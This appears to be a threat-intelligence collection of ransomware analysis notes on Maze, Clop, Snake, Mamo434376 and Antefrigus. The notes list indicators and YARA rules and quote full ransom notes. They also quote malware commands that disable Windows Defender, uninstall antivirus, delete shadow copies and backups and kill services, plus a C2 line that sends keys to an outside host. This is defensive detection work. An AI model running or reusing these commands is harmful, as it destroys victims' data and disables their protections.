file: `DECRYPT-FILES.txt` 33 | - Checks AV software: `Select * From AntiVirusProduct` via `root\SecurityCenter2` 34 | - Check shadow copies: `select * from Win32_ShadowCopy` via `ROOT\cimv2` 35 | - Used User-Agent in C2 traffic: `User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko` (essentially a stock IE11 string, the odd `AS;` token aside, so weak as a standalone network indicator — pair it with the destination) 36 | - Seen pdbs (these appear deliberately bogus — two of them name well-known ransomware researchers — so they are usable as detection strings but not as attribution signals): 37 | - `C:\random\fucking\path\to\fucking\idiotic\nonexisting\file\with\pdb\extension.pdb` 38 | - `C:\vc5\Release\Zeroaccess.pdb` 39 | - `C:\shit\gavno.pdb` 40 | - `C:\demonslay335\emsisoft_work\ransomware\hutchins.pdb` 41 | - Mutex is randomly generated: `Global\c35e0a1a78e8cdbc` 42 | - Same string used as `c35e0a1a78e8cdbc.tmp` on the file system 43 | - Shadow copy deletion: wmic `"%s" shadowcopy delete` via `Win32_ShadowCopy.ID='%s'` 44 | 45 | ## VT searches 46 | - imphash:"4c3d146415a27e5b2b768097598f2851" 47 | - imphash:"a0667aaff29d40b151e423bcd42d1e15" 48 | - imphash:"e6c2e529c8b3c790ab91901a5172e552" 49 | - resource:"0cad26ce9da0bb3e380866e27c5f5ad17bb2f363352105f42b3dc1e9086c9366" 50 | - resource:"884d4eddb1c544532c4225419e319749700b5503503e707f86b1cae740bc4c18" 51 | - resource:"a4d658476e4693a873db1a349aa5ca0238c1df1708d5e67ed0f0187784d7336d" 52 | 53 | ## Yara rules (VirusTotal Livehunt only: `new_file` and `signatures` are VT external variables, so this rule does not compile under stock yara, and it keys purely on other vendors' `Ransom…Maze` verdicts rather than on sample content) 54 | ```yara 55 | rule maze_caro 56 | { 57 | condition: 58 | new_file and signatures matches /.*Ransom.*Maze.*/ 59 | } 60 | ``` 61 | ## Ransom note 62 | ``` 63 | Attention! 64 | ---------------------------- 65 | | What happened? 66 | ---------------------------- 67 | All your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms. 68 | You cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps. 69 | ---------------------------- 70 | | How to get my files back? 71 | ---------------------------- 72 | The only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. 
73 | To contact us and purchase the key you have to visit our website in a hidden TOR network. 74 | There are general 2 ways to reach us: 75 | 1) [Recommended] Using hidden TOR network. 76 | a) Download a special TOR browser: https://www.torproject.org/ 77 | b) Install the TOR Browser. 78 | c) Open the TOR Browser. 79 | d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/%USERID% 80 | e) Follow the instructions on this page. 81 | 2) If you have any problems connecting or using TOR network 82 | a) Open our website: https://mazedecrypt.top/%USERID% 83 | b) Follow the instructions on this page. 84 | Warning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. 85 | On this page, you will see instructions on how to make a free decryption test and how to pay. 86 | Also it has a live chat with our operators and support team. 87 | ---------------------------- 88 | | What about guarantees? 89 | ---------------------------- 90 | We understand your stress and worry. 91 | So you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer! 92 | If you have any problems our friendly support team is always here to assist you in a live chat! 93 | ------------------------------------------------------------------------------- 94 | THIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! 
DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU 95 | ---BEGIN MAZE KEY--- 96 | %base64key% 97 | ---END MAZE KEY--- 98 | ``` 99 | -------------------------------------------------------------------------------- /Ransomware/Clop.md: -------------------------------------------------------------------------------- 1 | # Clop ransomware 2 | 3 | ## SHA256 hashes 4 | - 6d115ae4c32d01a073185df95d3441d51065340ead1eada0efda6975214d1920 5 | - 6d8d5aac7ffda33caa1addcdc0d4e801de40cb437cf45cface5350710cde2a74 6 | - 70f42cc9fca43dc1fdfa584b37ecbc81761fb996cb358b6f569d734fa8cce4e3 7 | - a5f82f3ad0800bfb9d00a90770c852fb34c82ecb80627be2d950e198d0ad6e8b 8 | - 85b71784734705f6119cdb59b1122ce721895662a6d98bb01e82de7a4f37a188 (unpacked) 9 | 10 | ## References 11 | - https://twitter.com/demonslay335/status/1093917007379087360 12 | - https://twitter.com/GossiTheDog/status/1210588988265943046 13 | - https://twitter.com/0x10000000/status/1103607518184390656 14 | - https://twitter.com/darb0ng/status/1210047075812954112 15 | - https://twitter.com/darb0ng/status/1199209654661738496 16 | - https://twitter.com/VK_Intel/status/1157742218549039105 17 | - https://twitter.com/VK_Intel/status/1162810558774747137 18 | - https://twitter.com/VK_Intel/status/1210067407806570496 19 | - https://www.bleepingcomputer.com/news/security/ransomware-hits-maastricht-university-all-systems-taken-down/ 20 | 21 | ## Targets 22 | - Maastricht University (UM) - The Netherlands 23 | 24 | ## Notes 25 | - TA505 26 | - Clop filemarker: `Clop^_-` 27 | - Ransom extension: `.clop` or `.CIop` 28 | - Ransom note: `ClopReadMe.txt` or `CIopReadMe.txt` (https://pastebin.com/rHQ8gzD9) 29 | - Ransom e-mails: 30 | ``` 31 | servicedigilogos@protonmail.com 32 | managersmaers@tutanota.com 33 | unlock@eqaltech.su 34 | unlock@royalmail.su 35 | unlock@goldenbay.su 36 | unlock@graylegion.su 37 | kensgilbomet@protonmail.com 38 | ``` 39 | - Using RSA 1024-bit public key 40 | - Then encrypts files with RC4 using 117 bytes of the 
public key 41 | - Other version uses `Mersenne Twister algorithm` 42 | - Tries to uninstall ESET AV by grepping ProductCode from `callback.log` file: 43 | ``` 44 | cmd.exe "/C MSIEXEC /x 'ESET ProductCode' /qb" 45 | ``` 46 | - Uninstalls MSC: 47 | ``` 48 | cmd.exe /C "C:\Program Files\Microsoft Security Client\Setup.exe" /x /s 49 | ``` 50 | - Other version checks for `MalwareBytes, Webroot, Panda` 51 | - Interesting API call: `OpenPrinterW(L"KJFk23983ruafbuyTHFNIO#wu", 0, 0);` 52 | - Signed with valid certificate 53 | - Check local language via GetKeyboardLayout against hardcoded list: `Georgian, Russian, Azerbaijan` 54 | 55 | ## AV evasion 56 | - Tries to disable Windows Defender 57 | ```text 58 | cmd.exe /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f 59 | cmd.exe /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f 60 | cmd.exe /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f 61 | cmd.exe /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f 62 | cmd.exe /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f 63 | cmd.exe /C reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f 64 | cmd.exe /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f 65 | cmd.exe /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpCloudBlockLevel" /t REG_DWORD /d "0" /f 66 | cmd.exe /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SpynetReporting" /t REG_DWORD /d "0" /f 67 | ``` 68 | - Tries to uninstall MalwareBytes 69 | ``` 
70 | cmd.exe /c \"C:\\Program Files\\Malwarebytes\\Anti-Ransomware\\unins000.exe\" /verysilent /suppressmsgboxes /norestart 71 | ``` 72 | 73 | ## Seen resources: 74 | - RC_DATAMAKEMONEY 75 | - RC_DATABIGBACK 76 | 77 | ## Seen mutexes: 78 | - FFRRTTOOOTTPPWWZZZLLSS^_- 79 | - MakeMoneyFromAirEathWorld#666Go 80 | - BestChangeT0pMoney^_-666 81 | 82 | ## Ransom note: 83 | ```text 84 | Your network has been penetrated. 85 | All files on each host in the network have been encrypted with a strong algorithm. 86 | Backups were either encrypted or deleted or backup disks were formatted. 87 | Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. 88 | We exclusively have decryption software for your situation 89 | No decryption software is available in the public. 90 | DO NOT RESET OR SHUTDOWN – files may be damaged. 91 | DO NOT RENAME OR MOVE the encrypted and readme files. 92 | DO NOT DELETE readme files. 93 | This may lead to the impossibility of recovery of the certain files. 94 | Photorec, RannohDecryptor etc. repair tools are useless and can destroy your files irreversibly. 95 | If you want to restore your files write to emails (contacts are at the bottom of the sheet) and attach 2-3 encrypted files 96 | (Less than 5 Mb each, non-archived and your files should not contain valuable information 97 | (Databases, backups, large excel sheets, etc.)). 98 | You will receive decrypted samples and our conditions how to get the decoder. 99 | 100 | Attention!!! 101 | Your warranty - decrypted samples. 102 | Do not rename encrypted files. 103 | Do not try to decrypt your data using third party software. 104 | We don`t need your files and your information. 105 | 106 | But after 2 weeks all your files and keys will be deleted automatically. 107 | Contact emails: 108 | servicedigilogos@protonmail.com 109 | or 110 | managersmaers@tutanota.com 111 | 112 | The final price depends on how fast you write to us. 
113 | 114 | Clop 115 | ``` 116 | 117 | ## Yara rules 118 | ```yara 119 | rule clop_ov_carosig 120 | { 121 | meta: 122 | author = "Albert Zsigovits" 123 | family = "Clop ransomware" 124 | 125 | condition: 126 | new_file and (signatures matches /.*Clop.*/) 127 | } 128 | -------------------------------------------------------------------------------- /Ransomware/Snake.md: -------------------------------------------------------------------------------- 1 | ## SNAKE / EKANS ransomware 2 | 3 | ## Hashes 4 | - e5262db186c97bbe533f0a674b08ecdafa3798ea7bc17c705df526419c168b60 5 | 6 | ## References 7 | - https://www.bleepingcomputer.com/news/security/snake-ransomware-is-the-next-threat-targeting-business-networks/ 8 | - https://twitter.com/VK_Intel/status/1214333066245812224 9 | - https://github.com/sysopfb/open_mal_analysis_notes/blob/master/e5262db186c97bbe533f0a674b08ecdafa3798ea7bc17c705df526419c168b60.md 10 | 11 | ## Sandbox runs 12 | - https://app.any.run/tasks/040f5530-fe29-42d6-b312-e3d338449f51 13 | - https://www.vmray.com/analyses/e5262db186c9/report/overview.html 14 | - https://hybrid-analysis.com/sample/e5262db186c97bbe533f0a674b08ecdafa3798ea7bc17c705df526419c168b60?environmentId=100 15 | - https://analyze.intezer.com/#/files/e5262db186c97bbe533f0a674b08ecdafa3798ea7bc17c705df526419c168b60/sub/fb9e8d93-92a9-477f-87f5-24f5c7a653d5 16 | 17 | ## Notes 18 | - Ransom note: `Fix-Your-Files.txt` 19 | - Ransom note put into: `C:\Users\Public\Desktop` 20 | - Ransom e-mail: `bapcocrypt@ctemplar.com` 21 | - Go build ID: `"X6lNEpDhc_qgQl56x4du/fgVJOqLlPCCIekQhFnHL/rkxe6tXCg56Ez88otHrz/Y-lXW-OhiIbzg3-ioGRz"` 22 | - Filemarker: `EKANS` 23 | - Mutex: `Global\EKANS` 24 | - Deletes shadow copies via: `SELECT * FROM Win32_ShadowCopy` 25 | - It appends a random 5 char string to the encrypted files' extension. 
`secret.pdf` becomes `secret.pdfbNcKl` 26 | 27 | ## RSA key: 28 | ``` 29 | -----BEGIN RSA PUBLIC KEY----- 30 | MIIBCgKCAQEAyQ+M5ve829umuy9+BSsUX/krgdF83L3m8/uxRvKX5EZbSh1+buON 31 | ZYr5MjfhrdiOGnrbB1j0Fy31U/uzvWcy7VvK/zcsO/5aAhujhHB/qMAVpZ8zT5BB 32 | ujT1Bvsith/BXgtM99MixD8oZ67VDZaRM9TPE89WuAjnaBZORrk48wFcn1DOAAHD 33 | Z9z9komtqIH1fm3Y0Q6P76nUscLsYOme082L217Th/lTMoqqs4cF2rn9O9Vp4V9U 34 | aCs4XVxGSpcuqbIscfpf0cm44P2eOEk+sbZdahO9C6fezt7YF4OCJ4Vz3qqMD6z4 35 | +6d7FRxUu6k3Te2T2bWBZnsDO30pYFi/gwIDAQAB 36 | -----END RSA PUBLIC KEY----- 37 | ``` 38 | 39 | ## Sample encrypted file 40 | - FileName 41 | - IV 42 | - ENCRYPTED_AES_Key 43 | 44 | ```byte 45 | a(`..g.ú.w.û~¸¶. 46 | Ùä7U.F..Lÿ.....n 47 | odceikemblegmpmk 48 | clo.ÿ......FileN 49 | ame.....IV.....E 50 | NCRYPTED_AES_Key 51 | .....þ.*ÿ...C:\a 52 | utoexec.bat 53 | ``` 54 | 55 | ## Skips encrypting the following locations 56 | - windir 57 | - SystemDrive 58 | - :\$Recycle.Bin 59 | - :\ProgramData 60 | - :\Users\All Users 61 | - :\Program Files 62 | - :\Local Settings 63 | - :\Boot 64 | - :\System Volume Information 65 | - :\Recovery 66 | - \AppData\ 67 | 68 | ## Ransom note 69 | ```text 70 | -------------------------------------------- 71 | | What happened to your files? 72 | -------------------------------------------- 73 | 74 | We breached your corporate network and encrypted the data on your computers. The encrypted data includes documents, databases, photos and more - all were encrypted using a military grade encryption algorithms (AES-256 and RSA-2048). You cannot access those files right now. But dont worry! 75 | 76 | You can still get those files back and be up and running again in no time. 77 | 78 | --------------------------------------------- 79 | | How to contact us to get your files back? 80 | --------------------------------------------- 81 | 82 | The only way to restore your files is by purchasing a decryption tool loaded with a private key we created specifically for your network. 
83 | 84 | Once run on an effected computer, the tool will decrypt all encrypted files - and you can resume day-to-day operations, preferably with better cyber security in mind. If you are interested in purchasing the decryption tool contact us at bapcocrypt@ctemplar.com 85 | 86 | ------------------------------------------------------- 87 | | How can you be certain we have the decryption tool? 88 | ------------------------------------------------------- 89 | 90 | In your mail to us attach up to 3 files (up to 3MB, no databases or spreadsheets). 91 | 92 | We will send them back to you decrypted. 93 | ``` 94 | 95 | ## Blacklisted extensions and files: 96 | ``` 97 | .docx 98 | .dll 99 | .exe 100 | .sys 101 | .mui 102 | .tmp 103 | .lnk 104 | .config 105 | .manifest 106 | .tlb 107 | .olb 108 | .blf 109 | .ico 110 | .regtrans-ms 111 | .devicemetadata-ms 112 | .settingcontent-ms 113 | .bat 114 | .cmd 115 | .ps1 116 | desktop.ini 117 | iconcache.db 118 | ntuser.dat 119 | ntuser.ini 120 | ntuser.dat.log1 121 | ntuser.dat.log2 122 | usrclass.dat 123 | usrclass.dat.log1 124 | usrclass.dat.log2 125 | bootmgr 126 | bootnxt 127 | ntldr 128 | NTDETECT.COM 129 | boot.ini 130 | bootfont.bin 131 | bootsect.bak 132 | desktop.ini 133 | ctfmon.exe 134 | iconcache.db 135 | ntuser.dat 136 | ntuser.dat.log 137 | ntuser.ini 138 | thumbs.db 139 | ``` 140 | 141 | ## Taskkill list: 142 | ``` 143 | ccflic0.exe 144 | ccflic4.exe 145 | healthservice.exe 146 | ilicensesvc.exe 147 | nimbus.exe 148 | prlicensemgr.exe 149 | certificateprovider.exe 150 | proficypublisherservice.exe 151 | proficysts.exe 152 | erlsrv.exe 153 | vmtoolsd.exe 154 | managementagenthost.exe 155 | vgauthservice.exe 156 | epmd.exe 157 | hasplmv.exe 158 | spooler.exe 159 | hdb.exe 160 | ntservices.exe 161 | n.exe 162 | monitoringhost.exe 163 | win32sysinfo.exe 164 | inet_gethost.exe 165 | taskhostw.exe 166 | proficy administrator.exe 167 | ntevl.exe 168 | prproficymgr.exe 169 | prrds.exe 170 | prrouter.exe 171 | prconfigmgr.exe 
172 | prgateway.exe 173 | premailengine.exe 174 | pralarmmgr.exe 175 | prftpengine.exe 176 | prcalculationmgr.exe 177 | prprintserver.exe 178 | prdatabasemgr.exe 179 | preventmgr.exe 180 | prreader.exe 181 | prwriter.exe 182 | prsummarymgr.exe 183 | prstubber.exe 184 | prschedulemgr.exe 185 | cdm.exe 186 | musnotificationux.exe 187 | npmdagent.exe 188 | client64.exe 189 | keysvc.exe 190 | server_eventlog.exe 191 | proficyserver.exe 192 | server_runtime.exe 193 | config_api_service.exe 194 | fnplicensingservice.exe 195 | workflowresttest.exe 196 | proficyclient.exe 197 | vmacthlp.exe 198 | msdtssrvr.exe 199 | sqlservr.exe 200 | msmdsrv.exe 201 | reportingservicesservice.exe 202 | dsmcsvc.exe 203 | winvnc4.exe 204 | client.exe 205 | collwrap.exe 206 | bluestripecollector.exe 207 | ``` -------------------------------------------------------------------------------- /Ransomware/Mamo434376.md: -------------------------------------------------------------------------------- 1 | ## Mamo434376 ransomware 2 | 3 | Might be related to other families: 4 | #MZREVENGE #KesLan #Deniz_Kızı 5 | 6 | ## SHA256 7 | - 24f5482541a024aa9655ee3a97481ec9ccdb660c037820159eb6992f2d0d72cb 8 | - 2dd6ab3f09ce00e4aca8099a205fd0633c5e3bf68a4ba64b860f2635ace82596 9 | - 2f61146c39b7838f741fcd769845191c9c3bf711fc72272125efbe4784c561b3 10 | - 4f7b4920df5e49893b2561dae65abbe3f6413993fb1d4bb0b9da1c28fcae1726 11 | - 83990eb15a86afd9de81534b3ed6d25cb0b5e26c16eb74d34b33106fb3b26bf3 12 | - 8b615646e5707e5b59fe3151d5a00839db8c9fe5ac3d2cab4d95e94d16a40ba4 13 | - c30ae67421647f8be7f8b61398ebdfc37c16a4be0760319980fcb1fc779fe4a8 14 | - dc5355924d19880cb834c8ca3894cffb0dde8005523bd4003bbc5c8ffc421967 15 | - f4a17ec97290cb0bb081308bbb94bb918a7b5d91a3b3ecc513a389b4f87e09e7 16 | 17 | ## VT perks: 18 | - `resource:"d283a8a3b073709f55ea1fd65720b57c3ddc0d4e25210b42845e6c03632ceadb"` (ransom note) 19 | - `C:\Users\Casper\Desktop\0xf4\0xf4\obj\Release\0xf4.pdb` (PDB) 20 | 21 | ## Encrypted extension 22 | ``` 23 | 
.TRSomware[is_back__New-Algorithm__By_MaMo434376] 24 | ``` 25 | 26 | ### Ransom notefile 27 | ``` 28 | Beni Oku!!!.txt 29 | ``` 30 | 31 | ## Ransom e-mails 32 | ``` 33 | yardimail1@aol.com 34 | yardimail2@aol.com 35 | ``` 36 | Both e-mails use the same backup phone: `05** *** ** 97` 37 | 38 | ## Seen PDBs 39 | ``` 40 | C:\Users\Casper\Desktop\0xf4\0xf4\obj\Release\0xf4.pdb 41 | ``` 42 | 43 | ## C2 44 | ``` 45 | random = abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 46 | string text = Form1.RandomString(150); 47 | string text2 = Form1.RandomString(12); 48 | new WebClient().DownloadString("http://zaammmama.tk/SHwLFOP19dHNKMSJ2mXhN92ZcpOcAEz.php?vIrMpaVbm86WzXjtcxEsw4YQ1Syo0B9NvOSuTlKNTsD9ksoe3Y2QTKSWC9sr=ID:_" + text2 + "___Key:___" + text); 49 | ``` 50 | 51 | ## Creates new host file (not hosts) 52 | ``` 53 | File.Delete("C:\\Windows\\System32\\drivers\\etc\\host"); 54 | Form1.createtextfilse("C:\\Windows\\System32\\drivers\\etc\\host", "127.0.0.1 validation.sls.microsoft.com"); 55 | ``` 56 | 57 | ## Disables Windows Task Manager 58 | ``` 59 | registryKey.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"); 60 | registryKey.SetValue("DisableTaskMgr", "1"); 61 | ``` 62 | 63 | ## Executed OS commands 64 | ``` 65 | netsh firewall set opmode disable 66 | vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB 67 | vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded 68 | vssadmin delete shadows /all /quiet 69 | wmic shadowcopy delete 70 | bcdedit /set {default} bootstatuspolicy ignoreallfailures 71 | bcdedit /set {default} recoveryenabled no 72 | wbadmin delete catalog -quiet 73 | wbadmin delete systemstatebackup 74 | wbadmin delete systemstatebackup -keepversions:0 75 | wbadmin delete backup 76 | ``` 77 | 78 | ## Services stoplist 79 | ``` 80 | net stop DbxSvc 81 | net stop OracleXETNSListener 82 | net stop OracleServiceXE 83 | net stop AcrSch2Svc 84 | net stop AcronisAgent 85 | net stop Apache2.4 86 | net stop 
SQLWriter 87 | net stop MSSQL$SQLEXPRESS 88 | net stop MSSQLServerADHelper100 89 | net stop MongoDB 90 | net stop SQLAgent$SQLEXPRESS 91 | net stop SQLBrowser 92 | net stop CobianBackup11 93 | net stop cbVSCService11 94 | net stop QBCFMontorService 95 | net stop QBVSS 96 | ``` 97 | 98 | ## Task killlist 99 | ``` 100 | taskkill /f /im sql.* 101 | taskkill /f /im winword.* 102 | taskkill /f /im wordpad.* 103 | taskkill /f /im outlook.* 104 | taskkill /f /im thunderbird.* 105 | taskkill /f /im oracle.* 106 | taskkill /f /im excel.* 107 | taskkill /f /im onenote.* 108 | taskkill /f /im virtualboxvm.* 109 | taskkill /f /im node.* 110 | taskkill /f /im QBW32.* 111 | taskkill /f /im WBGX.* 112 | taskkill /f /im Teams.* 113 | taskkill /f /im Flow.* 114 | ``` 115 | 116 | ## Extension list to encrypt: 117 | ``` 118 | ".txt" 119 | ".doc" 120 | ".docx" 121 | ".rar" 122 | ".zip" 123 | ".xls" 124 | ".bin" 125 | ".xlsx" 126 | ".ppt" 127 | ".pptx" 128 | ".rtf" 129 | ".odt" 130 | ".jpg" 131 | ".png" 132 | ".csv" 133 | ".sql" 134 | ".mdb" 135 | ".sln" 136 | ".php" 137 | ".asp" 138 | ".aspx" 139 | ".html" 140 | ".xml" 141 | ".psd" 142 | ``` 143 | 144 | ## Ransom note 145 | ``` 146 | Merhaba! 147 | 148 | Sisteminizde önemli gördüğümüz datalarınızı şifreledik. Bilindik veri kurtarma yöntemleri ile verilerinizi geri getiremeyeceğinizi - 149 | bilmenizi isteriz. 150 | Bu yöntemler sadece sizin zaman kaybetmenize sebep olacaktır. 151 | Yinede veri kurtarma firmaları yada programları kullanmak isterseniz lütfen asıl dosyalarınız üzerinde değil, 152 | bunların kopyaları üzerinde işlem yapınız ve/veya yaptırınız. 153 | Asıl dosyaların bozulması verilerinizin geri dönülmez şekilde zarar görmesine sebep olabilir. 154 | Sifrelenen dosyalarınızın asılları, üzerinde rast gele veri yazma tekniğini kullanarak silinmiştir. 155 | 156 | 2 gün içerisinde dönüş yapılmadığı taktirde, sisteminizde kullanılan şifre silinecektir ve verileriniz asla geri döndürülmiyecektir. 
157 | 158 | Diskleriniz Full disk encryption ile şifrelenmiştir yetkisiz müdahale kalici veri kaybına neden olur! 159 | 160 | Para verseniz daha açmazlar diyen bilgisayarcılara veya paranı alır dosyalarını vermez diyen - 161 | etrafınızdaki insanlara inanmayın. 162 | Size güven verecek kadar yeterli referansa sahibim. 163 | 164 | Sizi tanımıyorum, dolaysıyla ile size karşı kötü duygular beslemenin size kötülük yapmanın bir anlamı"da yok, 165 | amacım sadece bu işten bir gelir elde etmek. 166 | Ödeme Bitcoin ile yapılmaktadır. 167 | Bitcoin ne olduğunu buradan öğrenebilirsiniz : https://simple.wikipedia.org/wiki/Bitcoin 168 | Yaptığınız ödeme sonrasında, en kısa zamanda verilerinizi eski haline döndürmek için size özel bir şifre çözücü yapacağım - 169 | ve mail yoluyla size göndereceğim, ama tabi bunun için mail yoluyla bizimle iletişime geçmeniz ve bize ID"nizi göndermeniz gerekir. 170 | 171 | Şifre çözme aracının fiyatı 300 dolar. 172 | 24 saat içerisinde dönüş yaparsanız size %50 indirim yapacağım. 173 | 174 | Ödemeyi yapmak ve verilerinizin şifresini çözdürmek için aşağıdaki iletişim kanalından bizimle iletişime geçebilirsiniz. 175 | 176 | Ulaşmak istediğinizde mutlaka aşağıda size özel üretilen ID"yi eklemeyi unutmayınız. 
177 | 178 | SITE_CODE: 179 | ID: XXXXXXXXXX 180 | E-Mail: yardimail1@aol.com 181 | ``` 182 | -------------------------------------------------------------------------------- /Ransomware/Antefrigus.md: -------------------------------------------------------------------------------- 1 | # Antefrigus ransomware 2 | 3 | ## SHA256 hashes 4 | - 3cb061bd1c9326ec12d3b5f540d425730245472b72e5295f52b53b82ea03cb68 5 | - b90683251727a6e1e4e846adf7fa29a8dbfba0874cfedcd8a798239130d6c058 6 | 7 | ## References 8 | - https://www.bleepingcomputer.com/news/security/strange-antefrigus-ransomware-only-targets-specific-drives/ 9 | - https://id-ransomware.blogspot.com/2019/11/antefrigus-ransomware.html 10 | - https://twitter.com/malwrhunterteam/status/1195335031633432577 11 | - https://twitter.com/Amigo_A_/status/1195051403888267264 12 | - https://twitter.com/GrujaRS/status/1194692806083796993 13 | - https://twitter.com/VK_Intel/status/1216792575807541249 14 | 15 | ## Notes 16 | - Demanding a ransom of `1995 USD` in BTC, which doubles when it is not paid within four days and five hours, adding up `3990 USD` in BTC 17 | - Encrypts D:, E:, F:, G:, H:, and I: drives, but interestingly not C: 18 | - Drops a file to `C:\qweasd\test.txt`, in one case with a content: `5823142135788270` 19 | - Check in to `http://iplogger.org/10UJ73` 20 | - Appends a random character extension to encrypted files 21 | - The ransom note: `[extension]-readme.txt`, placed in `C:\Instraction` folder and on the `Desktop` 22 | - Deletes shadow copies via `wmic.exe shadowcopy delete` 23 | - Creates DirectXII.dll file, in one case with a content: `1823673412070204` 24 | - Creates DirectX1I.dll file, in one case with a content: `oqvfhnqo` 25 | 26 | ## Extension list 27 | ``` 28 | dll, adv, ani, big, bat, bin, cab, cmd, com, cpl, cur 29 | deskthemepack, diagcab, diagcfg, diagpkg, drv, exe, hlp 30 | icl, icns, ico, ics, idx, ldf, lnk, mod, mpa, msc, msp 31 | msstyles, msu, nls, nomedia, ocx, prf, rom, rtp, scr, shs 32 | spl, 
sys, theme, themepack, wpx, lock, key, hta, msi, pck 33 | ``` 34 | 35 | ## Folder exclusion list 36 | - C:/windows 37 | - C:/Windows 38 | - C:/intel 39 | - C:/nvidia 40 | - C:/ProgramData 41 | - C:/Program Files 42 | - C:/Program Files (x86) 43 | 44 | ## Task killist 45 | ``` 46 | taskkill /F /IM aupis80.exe 47 | taskkill /F /IM sql.exe 48 | taskkill /F /IM oracle.exe 49 | taskkill /F /IM ocssd.exe 50 | taskkill /F /IM dbsnmp.exe 51 | taskkill /F /IM synctime.exe 52 | taskkill /F /IM agntsvc.exe 53 | taskkill /F /IM isqlplussvc.exe 54 | taskkill /F /IM xfssvccon.exe 55 | taskkill /F /IM mydesktopservice.exe 56 | taskkill /F /IM ocautoupds.exe 57 | taskkill /F /IM encsvc.exe 58 | taskkill /F /IM tbirdconfig.exe 59 | taskkill /F /IM mydesktopqos.exe 60 | taskkill /F /IM ocomm.exe 61 | taskkill /F /IM dbeng50.exe 62 | taskkill /F /IM sqbcoreservice.exe 63 | taskkill /F /IM excel.exe 64 | taskkill /F /IM infopath.exe 65 | taskkill /F /IM msaccess.exe 66 | taskkill /F /IM mspub.exe 67 | taskkill /F /IM onenote.exe 68 | taskkill /F /IM outlook.exe 69 | taskkill /F /IM powerpnt.exe 70 | taskkill /F /IM steam.exe 71 | taskkill /F /IM thebat.exe 72 | taskkill /F /IM thunderbird.exe 73 | taskkill /F /IM visio.exe 74 | taskkill /F /IM winword.exe 75 | taskkill /F /IM wordpad.exe 76 | ``` 77 | 78 | ## TOR gate 79 | ``` 80 | yboa7nidpv5jdtumgfm4fmmvju3ccxlleut2xvzgn5uqlbjd5n7p3kid.onion 81 | ``` 82 | 83 | ## C2 uri params: 84 | ``` 85 | add_outstuk.php?name=[NAME]&pcName=[PCNAME]&key=[KEY]&memory=[MEMORY] 86 | ``` 87 | 88 | ## Ransom e-mails 89 | - antefrigus@cock.li 90 | 91 | ## PDB 92 | ``` 93 | G:\sever\Scan\crypro\rijndael_simd.cpp 94 | G:\sever\Scan\crypro\sha_simd.cpp 95 | G:\sever\Scan\crypro\sse_simd.cpp 96 | ``` 97 | 98 | ## Ransom notes 99 | ``` 100 | $$$$ $$ $$ $$$$$$ $$$$$ $$$$$$ $$$$$ $$$$$$ $$$$ $$ $$ $$$$ 101 | $$ $$ $$$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ 102 | $$$$$$ $$ $$$ $$ $$$$ $$$$ $$$$$ $$ $$ $$$ $$ $$ $$$$ 103 | $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ 
104 | $$ $$ $$ $$ $$ $$$$$ $$ $$ $$ $$$$$$ $$$$ $$$$ $$$$ 105 | 106 | [+] Whats Happen ? [+] 107 | Your files are encrypted, and currently unavailable.You can check it : all files on you computer has expansion hssjyh. 108 | By the way, everything is possible to recover(restore), but you need to follow our instructions.Otherwise, you cant return your data(NEVER). 109 | [+] What guarantees ? [+] 110 | Its just a business.We absolutely do not care about youand your deals, except getting benefits.If we do not do our workand liabilities - nobody will not cooperate with us.Its not in our interests. 111 | To check the ability of returning files, You should go to our website.There you can decrypt one file for free.That is our guarantee. 112 | If you will not cooperate with our service - for us, its does not matter.But you will lose your timeand data, cause just we have the private key.In practise - time is much more valuable than money. 113 | [+] How to get access on website ? [+] 114 | You have two ways : 115 | 1)[Recommended] Using a TOR browser! 116 | a) Download and install TOR browser from this site: https://torproject.org/ 117 | b) Open our website : http://yboa7nidpv5jdtumgfm4fmmvju3ccxlleut2xvzgn5uqlbjd5n7p3kid.onion/?hssjyh 118 | (If you can’t follow the link or other difficulty write to the technical support email : antefrigus@cock.li) 119 | 2) If TOR blocked in your country, try to use VPN! For this: 120 | a) Open any browser (Chrome, Firefox, Opera, IE, Edge) and download and install free VPN programm and download TOR browser from this site https://torproject.org/ 121 | b) If you are having difficulty purchase bitcoins, or you doubt in buying decryptor, contact to any data recovery company in your country, they will give you more guarantees and take purchase and decryption procedure on themselves. Almost all such companies heared about us and know that our decryption program work, so they can help you. 
